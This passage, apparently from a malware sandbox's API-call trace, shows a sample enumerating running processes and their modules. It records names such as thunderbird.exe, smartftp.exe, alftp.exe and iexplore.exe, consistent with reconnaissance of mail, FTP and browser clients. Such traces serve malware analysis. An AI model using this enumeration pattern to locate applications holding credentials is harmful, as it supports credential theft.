lpBaseName="wow64cpu.dll") returned 0xc [0052.604] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0052.604] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf4) returned 0x218 [0052.605] EnumProcessModules (in: hProcess=0x218, lphModule=0x265fa08, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x265fa08, lpcbNeeded=0x41eb20) returned 1 [0052.605] GetModuleInformation (in: hProcess=0x218, hModule=0xf20000, lpmodinfo=0x265fc78, cb=0x18 | out: lpmodinfo=0x265fc78*(lpBaseOfDll=0xf20000, SizeOfImage=0x17000, EntryPoint=0xf214a1)) returned 1 [0052.605] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xf20000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="thunderbird.exe") returned 0xf [0052.606] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xf20000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Program Files\\Microsoft Office\\thunderbird.exe" (normalized: "c:\\program files\\microsoft office\\thunderbird.exe")) returned 0x31 [0052.606] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2661ea0, cb=0x18 | out: lpmodinfo=0x2661ea0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0052.606] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0052.607] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0052.607] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2664060, cb=0x18 | out: lpmodinfo=0x2664060*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0052.607] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0052.608] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0052.608] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2666238, cb=0x18 | out: lpmodinfo=0x2666238*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0052.608] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0052.609] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0052.609] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2668408, cb=0x18 | out: lpmodinfo=0x2668408*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0052.610] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0052.610] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0052.611] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x818) returned 0x218 [0052.611] EnumProcessModules (in: hProcess=0x218, lphModule=0x266ab18, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x266ab18, lpcbNeeded=0x41eb20) returned 1 [0052.611] GetModuleInformation (in: hProcess=0x218, hModule=0x60000, lpmodinfo=0x266ad88, cb=0x18 | out: lpmodinfo=0x266ad88*(lpBaseOfDll=0x60000, SizeOfImage=0x17000, EntryPoint=0x614a1)) returned 1 [0052.611] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x60000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="whatsapp.exe") returned 0xc [0052.612] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x60000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Journal\\whatsapp.exe" (normalized: "c:\\program files\\windows journal\\whatsapp.exe")) returned 0x2d [0052.612] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x266cfa8, cb=0x18 | out: lpmodinfo=0x266cfa8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0052.612] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0052.612] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0052.613] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x266f168, cb=0x18 | out: lpmodinfo=0x266f168*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0052.613] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0052.613] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0052.614] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2671328, cb=0x18 | out: lpmodinfo=0x2671328*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0052.614] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0052.615] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0052.615] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x26734f8, cb=0x18 | out: lpmodinfo=0x26734f8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0052.615] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0052.616] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0052.616] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a0) returned 0x218 [0052.617] EnumProcessModules (in: hProcess=0x218, lphModule=0x2675c08, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2675c08, lpcbNeeded=0x41eb20) returned 1 [0052.617] GetModuleInformation (in: hProcess=0x218, hModule=0x1380000, lpmodinfo=0x2675e78, cb=0x18 | out: lpmodinfo=0x2675e78*(lpBaseOfDll=0x1380000, SizeOfImage=0x17000, EntryPoint=0x13814a1)) returned 1 [0052.617] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x1380000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ball.exe") returned 0x8 [0052.618] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x1380000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Portable Devices\\ball.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\ball.exe")) returned 0x38 [0052.618] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x26780a8, cb=0x18 | out: lpmodinfo=0x26780a8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0052.618] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0052.618] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0052.619] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x267a280, cb=0x18 | out: lpmodinfo=0x267a280*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0052.619] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0052.620] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0052.620] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x267c440, cb=0x18 | out: lpmodinfo=0x267c440*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0052.620] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0052.621] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0052.623] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x267e610, cb=0x18 | out: lpmodinfo=0x267e610*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0052.623] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0052.623] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0052.624] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x43c) returned 0x218 [0052.624] EnumProcessModules (in: hProcess=0x218, lphModule=0x2680d20, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2680d20, lpcbNeeded=0x41eb20) returned 1 [0052.625] GetModuleInformation (in: hProcess=0x218, hModule=0x940000, lpmodinfo=0x2680f90, cb=0x18 | out: lpmodinfo=0x2680f90*(lpBaseOfDll=0x940000, SizeOfImage=0x17000, EntryPoint=0x9414a1)) returned 1 [0052.625] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x940000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="webdrive.exe") returned 0xc [0052.625] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x940000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\WindowsPowerShell\\webdrive.exe" (normalized: "c:\\program files (x86)\\windowspowershell\\webdrive.exe")) returned 0x35 [0052.626] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x26831c0, cb=0x18 | out: lpmodinfo=0x26831c0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0052.626] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0052.626] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0052.627] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2685380, cb=0x18 | out: lpmodinfo=0x2685380*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0052.627] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0052.632] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0052.632] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2496738, cb=0x18 | out: lpmodinfo=0x2496738*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0052.632] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0052.633] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0052.633] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2498908, cb=0x18 | out: lpmodinfo=0x2498908*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0052.633] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0052.634] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0052.635] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb28) returned 0x218 [0052.635] EnumProcessModules (in: hProcess=0x218, lphModule=0x249b030, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x249b030, lpcbNeeded=0x41eb20) returned 1 [0052.635] GetModuleInformation (in: hProcess=0x218, hModule=0xd70000, lpmodinfo=0x249b2a0, cb=0x18 | out: lpmodinfo=0x249b2a0*(lpBaseOfDll=0xd70000, SizeOfImage=0x17000, EntryPoint=0xd714a1)) returned 1 [0052.635] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xd70000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="alftp.exe") returned 0x9 [0052.636] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xd70000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Portable Devices\\alftp.exe" (normalized: "c:\\program files\\windows portable devices\\alftp.exe")) returned 0x33 [0052.636] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x249d4c0, cb=0x18 | out: lpmodinfo=0x249d4c0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0052.636] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0052.636] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0052.637] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x249f680, cb=0x18 | out: lpmodinfo=0x249f680*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0052.637] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0052.638] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0052.638] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x24a1840, cb=0x18 | out: lpmodinfo=0x24a1840*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0052.638] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0052.639] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0052.639] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x24a3a10, cb=0x18 | out: lpmodinfo=0x24a3a10*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0052.639] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0052.640] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0052.641] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbec) returned 0x218 [0052.641] EnumProcessModules (in: hProcess=0x218, lphModule=0x24a6120, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24a6120, lpcbNeeded=0x41eb20) returned 1 [0052.641] GetModuleInformation (in: hProcess=0x218, hModule=0x280000, lpmodinfo=0x24a6390, cb=0x18 | out: lpmodinfo=0x24a6390*(lpBaseOfDll=0x280000, SizeOfImage=0x17000, EntryPoint=0x2814a1)) returned 1 [0052.641] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x280000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="smartftp.exe") returned 0xc [0052.642] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x280000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Program Files\\Uninstall Information\\smartftp.exe" (normalized: "c:\\program files\\uninstall information\\smartftp.exe")) returned 0x33 [0052.642] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24a85b8, cb=0x18 | out: lpmodinfo=0x24a85b8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0052.642] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0052.642] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0052.643] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x24aa778, cb=0x18 | out: lpmodinfo=0x24aa778*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0052.643] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0052.643] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0052.644] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x24ac938, cb=0x18 | out: lpmodinfo=0x24ac938*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0052.644] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0052.645] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0052.645] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x24aeb08, cb=0x18 | out: lpmodinfo=0x24aeb08*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0052.645] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0052.646] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0052.646] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2ac) returned 0x218 [0052.646] EnumProcessModules (in: hProcess=0x218, lphModule=0x24b1230, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24b1230, lpcbNeeded=0x41eb20) returned 1 [0052.647] GetModuleInformation (in: hProcess=0x218, hModule=0xf00000, lpmodinfo=0x24b14a0, cb=0x18 | out: lpmodinfo=0x24b14a0*(lpBaseOfDll=0xf00000, SizeOfImage=0xa6000, EntryPoint=0xf01c9a)) returned 1 [0052.647] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xf00000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="iexplore.exe") returned 0xc [0052.647] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xf00000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe")) returned 0x35 [0052.648] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24b36d0, cb=0x18 | out: lpmodinfo=0x24b36d0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0052.648] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0052.648] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0052.649] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x24b5890, cb=0x18 | out: lpmodinfo=0x24b5890*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0052.649] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0052.649] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0052.650] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x24b7a50, cb=0x18 | out: lpmodinfo=0x24b7a50*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0052.650] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0052.650] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0052.651] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x24b9c20, cb=0x18 | out: lpmodinfo=0x24b9c20*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0052.651] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0052.652] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0052.652] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x218 [0052.652] EnumProcessModules (in: hProcess=0x218, lphModule=0x24bc330, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24bc330, lpcbNeeded=0x41eb20) returned 1 [0052.656] EnumProcessModules (in: hProcess=0x218, lphModule=0x24bc548, cb=0x400, lpcbNeeded=0x41eb20 | out: lphModule=0x24bc548, lpcbNeeded=0x41eb20) returned 1 [0052.659] GetModuleInformation (in: hProcess=0x218, hModule=0xff130000, lpmodinfo=0x24bc9b8, cb=0x18 | out: lpmodinfo=0x24bc9b8*(lpBaseOfDll=0xff130000, SizeOfImage=0x14000, EntryPoint=0xff132ce0)) returned 1 [0052.660] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff130000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="taskhost.exe") returned 0xc [0052.660] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff130000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\taskhost.exe" (normalized: "c:\\windows\\system32\\taskhost.exe")) returned 0x20 [0052.660] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24bebc0, cb=0x18 | out: lpmodinfo=0x24bebc0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0052.660] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0052.661] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0052.661] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x24c0d80, cb=0x18 | out: lpmodinfo=0x24c0d80*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0052.661] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0052.662] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0052.662] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x24c2f68, cb=0x18 | out: lpmodinfo=0x24c2f68*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0052.662] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0052.663] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0052.663] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x24c5138, cb=0x18 | out: lpmodinfo=0x24c5138*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0052.664] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0052.664] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x784440, nSize=0x800 | 